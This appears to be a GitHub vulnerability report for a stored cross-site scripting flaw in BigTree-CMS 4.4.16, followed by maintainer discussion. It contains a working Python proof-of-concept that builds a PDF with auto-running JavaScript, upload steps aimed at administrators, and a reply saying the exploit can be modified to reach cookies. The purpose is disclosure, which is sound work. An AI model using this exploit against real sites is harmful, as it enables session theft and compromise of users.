A stored cross-site scripting (XSS) vulnerability exists in BigTree-CMS 4.4.16 that allows an authenticated user authorized to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack.
Login as admin and access the files upload page:
Use the following PoC to generate malicious files:
importsysfrompdfrwimportPdfWriterfrompdfrw.objects.pdfnameimportPdfNamefrompdfrw.objects.pdfstringimportPdfStringfrompdfrw.objects.pdfdictimportPdfDictfrompdfrw.objects.pdfarrayimportPdfArraydefmake_js_action(js):
action=PdfDict()
action.S=PdfName.JavaScriptaction.JS=jsreturnactiondefmake_field(name, x, y, width, height, r, g, b, value=""):
annot=PdfDict()
annot.Type=PdfName.Annotannot.Subtype=PdfName.Widgetannot.FT=PdfName.Txannot.Ff=2annot.Rect=PdfArray([x, y, x+width, y+height])
annot.MaxLen=160annot.T=PdfString.encode(name)
annot.V=PdfString.encode(value)
# Default appearance stream: can be arbitrary PDF XObject or# something. Very general.annot.AP=PdfDict()
ap=annot.AP.N=PdfDict()
ap.Type=PdfName.XObjectap.Subtype=PdfName.Formap.FormType=1ap.BBox=PdfArray([0, 0, width, height])
ap.Matrix=PdfArray([1.0, 0.0, 0.0, 1.0, 0.0, 0.0])
ap.stream="""%f %f %f rg0.0 0.0 %f %f re f"""% (r, g, b, width, height)
# It took me a while to figure this out. See PDF spec:# https://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/pdf_reference_1-7.pdf#page=641# Basically, the appearance stream we just specified doesn't# follow the field rect if it gets changed in JS (at least not in# Chrome).# But this simple MK field here, with border/color# characteristics, _does_ follow those movements and resizes, so# we can get moving colored rectangles this way.annot.MK=PdfDict()
annot.MK.BG=PdfArray([r, g, b])
returnannotdefmake_page(fields, script):
page=PdfDict()
page.Type=PdfName.Pagepage.Resources=PdfDict()
page.Resources.Font=PdfDict()
page.Resources.Font.F1=PdfDict()
page.Resources.Font.F1.Type=PdfName.Fontpage.Resources.Font.F1.Subtype=PdfName.Type1page.Resources.Font.F1.BaseFont=PdfName.Helveticapage.MediaBox=PdfArray([0, 0, 612, 792])
page.Contents=PdfDict()
page.Contents.stream="""BT/F1 24 TfET """annots=fieldspage.AA=PdfDict()
# You probably should just wrap each JS action with a try/catch,# because Chrome does no error reporting or even logging otherwise;# you just get a silent failure.page.AA.O=make_js_action("""try { %s} catch (e) { app.alert(e.message);} """% (script))
page.Annots=PdfArray(annots)
returnpageiflen(sys.argv) >1:
js_file=open(sys.argv[1], 'r')
fields= []
forlineinjs_file:
ifnotline.startswith('/// '): breakpieces=line.split()
params= [pieces[1]] + [float(token) fortokeninpieces[2:]]
fields.append(make_field(*params))
js_file.seek(0)
out=PdfWriter()
out.addpage(make_page(fields, js_file.read()))
out.write('result.pdf')
Back to Files then we can see result.pdf have been upload:
When the administrator click the result.pdf it will trigger a XSS attack. In addition, after switching to a normal user, the normal user still have permission to access/site/index.php/admin/files/result.pdf and trigger a XSS attack.
The text was updated successfully, but these errors were encountered:
Do you have a proposed solution for this? It would seem that the XSS vulnerability is within the browser itself if any uploaded PDF can potentially execute Javascript for the domain on which it is present.
Does the PDF have access to the domain's cookies or is the attack surface limited to just annoyances?
The implementation of document.cookie can be achieved by modifying the exp, see https://github.com/osnr/horrifying-pdf-experiments for details. Updating the upload component to review the contents of the pdf file before uploading is a good idea.
A stored cross-site scripting (XSS) vulnerability exists in BigTree-CMS 4.4.16 that allows an authenticated user authorized to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack.
/site/index.php/admin/files/result.pdfand trigger a XSS attack.The text was updated successfully, but these errors were encountered: